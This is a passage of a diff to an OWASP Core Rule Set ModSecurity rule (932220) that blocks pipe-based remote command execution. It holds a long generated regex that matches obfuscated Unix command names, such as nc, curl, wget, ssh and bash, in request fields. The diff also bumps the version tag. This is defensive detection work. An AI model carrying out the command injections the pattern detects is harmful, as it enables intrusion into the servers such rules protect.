-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\x0b]*|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cdgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|s(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)?|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \ "id:932220,\ phase:2,\ block,\ @@ -474,7 +473,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ 